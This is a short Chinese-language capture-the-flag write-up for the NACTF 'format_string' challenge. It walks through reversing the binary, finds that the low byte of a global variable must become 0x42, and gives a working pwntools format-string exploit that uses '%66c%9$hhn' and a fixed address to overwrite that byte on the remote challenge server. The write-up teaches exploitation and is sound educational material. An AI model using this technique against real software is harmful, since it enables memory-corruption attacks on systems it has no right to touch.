###### tags: `nactf` # format_string(300) - 這題其實很簡單,主要看懂Code - ![](https://i.imgur.com/mz19mOH.png) - 首先f5 - 我們發現V3 = 0x30u - num = V3 - ![](https://i.imgur.com/zr4fL66.png) - 點進去check num後 - V0的lobyte就是最小byte被改成0x42(66) - num要等於V0就get flag,也就是num的最小byte也要變成0x42 - gdb直接到check num跑起來發現 - ![](https://i.imgur.com/Tv6QmdV.png) - num位置 - ![](https://i.imgur.com/ShhxwaP.png) - pie也沒開 ```python= from pwn import * context.arch = 'amd64' p = remote("challenges.ctfd.io",30266) #p = process(./format) fmt = ('%66c%9$hhn'.ljust(0x18,'\x00')+ p64(0x404080)) p.sendafter('Give me some text.',fmt) p.interactive() ``` - %p後找到stack然後ljust0x18,stack在第六個加3後從第9個寫入~ - ![](https://i.imgur.com/7H0iq3E.png)